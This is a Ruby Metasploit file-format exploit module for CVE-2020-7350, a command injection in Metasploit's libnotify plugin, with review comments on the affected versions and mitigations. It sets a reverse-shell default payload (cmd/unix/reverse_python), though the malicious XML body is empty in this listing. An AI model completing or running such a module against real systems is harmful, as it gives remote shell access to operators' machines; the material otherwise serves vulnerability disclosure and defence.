##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module registered for CVE-2020-7350.
#
# Per its own description, the issue is a shell command injection in the
# Metasploit libnotify plugin affecting Metasploit 5.0.79 and earlier.
# The module writes one file (named by the FILENAME option) through the
# FILEFORMAT mixin's +file_create+; it opens no network connection itself.
#
# Defensive reading: the affected component is the framework's own plugin,
# so the exposed party is an operator who runs the libnotify plugin on an
# affected version and loads scan data from a source they do not control.
# Moving past the affected version range and treating imported scan files
# as untrusted input are the relevant mitigations; the upstream issue is
# listed under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata and the single FILENAME option.
  #
  # @param info [Hash] caller-supplied metadata merged in by +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
        # Kept on one line so the string matches the page byte for byte.
        'Description' => %q( This module exploits a shell command injection vulnerability in the libnotify plugin. This vulnerability affects Metasploit versions 5.0.79 and earlier. ),
        'DisclosureDate' => 'Mar 04 2020',
        'License' => GPL_LICENSE,
        'Author' => [
          # NOTE(review): trailing space kept as captured; a contact suffix
          # may have been lost in extraction -- confirm against upstream.
          'pasta ' # Discovery and PoC
        ],
        'References' => [
          ['CVE', '2020-7350'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/issues/13026']
        ],
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Payload' => { 'DisableNops' => true },
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DefaultTarget' => 0
      )
    )

    # FILENAME is optional (required flag is false) and defaults to scan.xml.
    register_options([OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml'])])
  end

  # Writes the output document via +file_create+ after announcing its name.
  #
  # NOTE(review): as captured on this page the literal below holds only a
  # newline; the document body is not present here, so the file written
  # from this listing would contain nothing else.
  def exploit
    xml = %(
)
    output_name = datastore['FILENAME']
    print_status("Writing xml file: #{output_name}")
    file_create(xml)
  end
end